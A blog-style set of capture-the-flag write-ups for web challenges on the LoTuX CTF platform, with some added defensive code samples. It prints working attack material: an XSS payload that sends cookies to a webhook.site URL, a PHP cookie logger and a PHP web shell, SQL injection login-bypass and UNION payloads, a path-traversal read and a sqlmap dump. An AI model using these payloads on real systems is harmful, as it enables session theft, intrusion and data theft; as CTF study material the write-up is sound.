LoTuX CTF WriteUp-Web

Before all

I started my challenges on LoTuX CTF in May, and I've solved most of the Web and Cryptography challenges on this platform now; down below are my write-ups (WPs) :)
LoTuXCTF.com

Write Up

HTML

An e4sy challenge, start with a view source~

<!DOCTYPE html>
<html>
<head>
<title>Welcome!</title>
</head>
<body>
<header>
<h1>Welcome!</h1>
</header>
This is my very first page,and there are nothing.
<br><br>
<button onclick="cat()" hidden> Check out my second page </button>
<script>
function cat(){
    window.location.href = "cat.html";
}
function magic(){
    window.location.href = "secret.html";
}
</script>
</body>
</html>

There were two hidden buttons calling the functions cat() and magic(), so I called them from the console.
After that, I landed on a page titled This is a cute cat and a page called secret, and collected two partial flags: LoTuX{fR0nT_ and 3nD_h1Dden_.
Finally, I inspected the secret page again and found another hidden page whose path was flag.html.
I opened flag.html and got the last part of the flag: Mes54ge}.

Usefull tools

Also a starter one.
First I just opened the webpage and found a hint called burp5u17e_ch4ll3nge.
So I opened Burp Suite and captured a request; the header had an option called challenge with the value 0, so I just changed it to 1 and got a partial flag LoTuX{bd244966385a624 and a hint telling me to use curl.
Next, I sent a curl request:

curl  http://lotuxctf.com:20001/cur1_ch4ll3nge

And received this response:

{"error":"Error","hint":"How to view headers?"}

So I changed the payload into this:

curl -i  http://lotuxctf.com:20001/cur1_ch4ll3nge

And the response headers appeared:

HTTP/1.1 200 OK
Server: gunicorn
Date: Tue, 19 Sep 2023 23:47:56 GMT
Connection: close
Content-Type: application/json
Content-Length: 48
Hint: In an HTTP request, there is an important element called the request method. If the server allows any requests methods other than GET, how can we know which other methods are allowed by the server?

{"error":"Error","hint":"How to view headers?"}

So I sent an OPTIONS request to get the allowed HTTP methods, but nothing appeared in the body, so I added -i to my request and saw the headers:

HTTP/1.1 200 OK
Server: gunicorn
Date: Tue, 19 Sep 2023 23:51:36 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Allow: HEAD, GET, H1DD3N_HT7P_ME7H0D, OPTIONS
Content-Length: 0

Well… there was a method called H1DD3N_HT7P_ME7H0D; I just sent a request with it and got the second part of the flag:

curl -i -X H1DD3N_HT7P_ME7H0D  http://lotuxctf.com:20001/cur1_ch4ll3nge

Received data:

HTTP/1.1 200 OK
Server: gunicorn
Date: Tue, 19 Sep 2023 23:52:55 GMT
Connection: close
Content-Type: application/json
Content-Length: 31
Flag2: 6c007b36cb1719bcc21c2ac

{"next":"/r3que57s_ch4ll3nge"}

A partial flag and a hint telling me to try Python requests; this was my script:

import requests as req

s = req.Session()

s.get('http://lotuxctf.com:20001/r3que57s_ch4ll3nge')
print(s.post('http://lotuxctf.com:20001/r3que57s_ch4ll3nge').text)

And it FINALLY ended; I was a little bit tired, bruh

{"flag3":"9997b6814310506060199a6aa4}","next":"https://www.youtube.com/watch?v=dQw4w9WgXcQ"}

A site containing some meme cats; the links of the pictures were interesting:

http://lotuxctf.com:20003/4310.jpg

So I used gobuster to brute-force the paths from 0000 to 9999:

gobuster dir --url http://lotuxctf.com:20003/ -w 0000_to_9999

There was a hidden image:

http://lotuxctf.com:20003/6166.jpg

With the words written on it (spin cat), I just opened the path http://lotuxctf.com:20003/spin.php; there was a base64 value aGFwcHk= on the button, so I changed it into the base64 of "spin".
And there's the cute flag~~~
LoTuX{Th3reR2kinds0fc4tv1dEos}

forum

First of all, I logged in as user with the account/password provided.
OK, there were some posts but only admin could edit them…
So I went back to the login page and bypassed the password with a simple SQL injection payload:

account:admin'#
password:a

Aha, logged in successfully and got the second(?!) part of the flag at the first post…

Flag 2/2 : _vu1ner4biliTy}

So.. where's my first flag XD
I was stuck here; after ten minutes, I found out the first flag was at post0.php…

Flag 1/2:LoTuX{S0_Much

What an IDOR 🙃
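The login bypass above works because the account value is spliced into the SQL text, so the quote and comment characters change the query. As an added example (not code from the challenge or from this write-up's author), the snippet below runs a concatenated login beside a parameterized one against a constructed SQLite table; SQLite uses "--" as its line comment where MySQL accepted "#", so the demo payload is written with "--".

```python
import sqlite3


def make_db():
    """Constructed in-memory users table; the password is a placeholder."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, account TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'not-the-real-password')")
    return db


def login_vulnerable(db, account, password):
    """String concatenation: the submitted account becomes part of the SQL grammar."""
    sql = ("SELECT account FROM users WHERE account = '" + account +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, account, password):
    """Parameterized query: both values are bound, never parsed as SQL."""
    row = db.execute(
        "SELECT account FROM users WHERE account = ? AND password = ?",
        (account, password),
    ).fetchone()
    return row[0] if row else None
```

With the same inputs the concatenated version returns the admin row while the parameterized version finds no account literally named "admin'--".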

A message board web app where you can let the admin visit your post on your homepage.
I just used the XSS payload below and stole cookies with webhook.site.

<script>
fetch('https://webhook.site/a834359c-ba8f-4762-890c-fbfc9f48688a?cookie='+document.cookie);
</script>

and clicked "share to admin"; back at the webhook site I got the flag~~
BTW, there's also an XSS cookie-logging payload written in PHP if the site has some other protections:

<?php
foreach($_COOKIE as $key => $value){
    system("echo $key >> logger.txt");
    system("echo $value >> logger.txt");
}
?>

and check the path logger.txt:

session
4bc94b4a-235e-43f8-88db-836a21466279.PYAiiRxKXmymNY5ivwjz_NMsxqE
PHPSESSID
234a3e6a721faf88e21700d4b9043765
TOP_SECRET
LoTuX{XSS_ch4ll3nGe_For_8abYs}

Over!!!

LoTuX CTF Min 0

First, I used GitHacker to retrieve the exposed .git directory:

githacker --url http://lotuxctf.com:20006/.git/ --output-folder .

Then I moved into the folder and checked the logs:

git log

Response:

commit 2e2da5c31bcce34a4b5019cf8ab45987a8dcca22 (HEAD -> master, origin/master, origin/HEAD)
Author: Curious-Lucifer <curious.lucifer.domini@gmail.com>
Date: Sat Aug 12 20:25:01 2023 +0800

Finish

commit e9dea4d8d3c8b8b24bcb031649fc0421d330b762
Author: Curious-Lucifer <curious.lucifer.domini@gmail.com>
Date: Sat Aug 12 20:24:24 2023 +0800

commit

Reset to the previous one:

git reset --hard HEAD^

There was a file init.sql; in it I found the flag and also a SQL injection for LoTuX CTF Min 1.
flag:
LoTuX{Why_1s_thi$_per50n_sO_c4r3le5s?}

LoTuX CTF Min 1

Using the SQL injection found in challenge 0, I registered with a UNION-based SQL injection payload as the username:

' UNION SELECT concat(id), concat(tag), concat(content), NULL FROM secret #

And I got the flag.
LoTuX{Wh4t_@_maRv3l0u5_de$1gn_7h1s_1s?!?}

Blank Site 1

A BLANK site with only a picture; check out its URL:

http://lotuxctf.com:20007/uploads?file=BlankSite.png

Maybe a LFI?

http://lotuxctf.com:20007/uploads?file=../app.py

Aha! Below are its contents:

from flask import *

app = Flask(__name__)

@app.get('/')
def index():
    return render_template('index.html')

@app.get('/uploads')
def uploads():
    file = request.args.get("file")
    if "FLAG2" in file:
        return "(≖_≖)✧"

    return send_file("uploads/" + file)

@app.get('/1d538e83d6f6b08f')
def secret():
    try:
        with open('/proc/sys/kernel/random/boot_id') as f:
            hint = f.readline().strip()
    except:
        hint = ""

    return {"FLAG1": "LoTuX{Wh4t_k1nD_oF_vUln3rabIli7y_fr0m_tHe_l@st_c3ntUrY_i5_thi$?!}", "Hint": hint}

app.run("0.0.0.0", 20007, debug=True)

I got the flag, and also the path '/1d538e83d6f6b08f' to exploit the boot id for Blank Site 2.
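The handler above concatenates the user-supplied name onto "uploads/" and only denylists the substring "FLAG2", which is why "../app.py" walks out of the directory. As an added example (not the challenge's code), the resolver below does what Flask's send_from_directory does internally: resolve the full path, then verify it is still inside the upload directory; it is written with os.path only so it runs without Flask, and demo() builds a constructed upload tree in a temp directory.

```python
import os
import tempfile


def resolve_upload(upload_dir, requested):
    """Return the absolute path for `requested` only if it stays inside upload_dir."""
    base = os.path.realpath(upload_dir)
    # join() discards base for an absolute `requested`; realpath collapses '..'
    # and symlinks, so the containment check below sees the real target.
    target = os.path.realpath(os.path.join(base, requested))
    # The target must be a strict descendant of base (base + separator prefix).
    if not target.startswith(base + os.sep):
        return None
    # Serve regular files only: no directories, no missing paths.
    if not os.path.isfile(target):
        return None
    return target


def demo():
    """Constructed layout: <tmp>/uploads/BlankSite.png next to <tmp>/app.py."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    with open(os.path.join(uploads, "BlankSite.png"), "wb") as f:
        f.write(b"\x89PNG\r\n\x1a\n")  # constructed PNG header placeholder
    with open(os.path.join(root, "app.py"), "w") as f:
        f.write("# application source that must not be served\n")
    return {
        "image": resolve_upload(uploads, "BlankSite.png") is not None,
        "traversal": resolve_upload(uploads, "../app.py"),   # None: escapes base
        "absolute": resolve_upload(uploads, "/etc/passwd"),  # None: join drops base
        "missing": resolve_upload(uploads, "nothere.png"),   # None: not a file
    }
```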

Image Uploader 1

An image upload web app; I just uploaded a PHP backdoor XD.

<?php system($_GET['cmd']) ?>

I just visited the path and got RCE; with simple observation I found flag.txt (it was there but has now been deleted by some awful challengers):
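The uploader accepted a .php file and then executed it from the upload directory. As an added example (not the challenge's code), the check below is the server-side gate an upload handler should apply before storing anything: an allowlist of image extensions, a single-extension rule, and a magic-byte check that the bytes really are that image type; the decisive control is still serving uploads from a location the web server never executes.

```python
import os

# Allowlisted image types mapped to the leading bytes each format starts with.
ALLOWED = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif": [b"GIF87a", b"GIF89a"],
}


def check_upload(filename, data):
    """Return (ok, reason) for a candidate upload; reject on the first failure."""
    name = os.path.basename(filename)      # drop any directory component
    root, ext = os.path.splitext(name)
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, "extension not allowed"
    # shell.php.png style double extensions are rejected outright.
    if "." in root:
        return False, "multiple extensions"
    # The content must begin with the magic bytes of the claimed type.
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match extension"
    # Defence in depth: a valid image header followed by a PHP open tag is a polyglot.
    if b"<?php" in data or b"<?=" in data:
        return False, "script tag inside image data"
    return True, "ok"
```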

How2Login

Ah, my first thought was like, "well… just a SQL injection bypass for 300 points(?!)".
Nope haha, so I opened my OWASP tool and glimpsed a path called test.php
(p.s. it could be found with dirsearch but my OWASP tool did this first XD)
It was a page to check whether a user exists, and the link looked like this:

http://lotuxctf.com:20010/test.php?username=admin

SQL Injection!!!
I opened sqlmap and used the payload:

sqlmap -u http://lotuxctf.com:20010/test.php?username=admin --dump

It was an error-based SQL injection; the data was hashed with sha256, but it was a weak password XD
data dumped:

account: admin
password: P@ssW0rd

Cute Flag: LoTuX{Inj3ct1on&HAAAsh}

THE EYE 2

Blank Site 2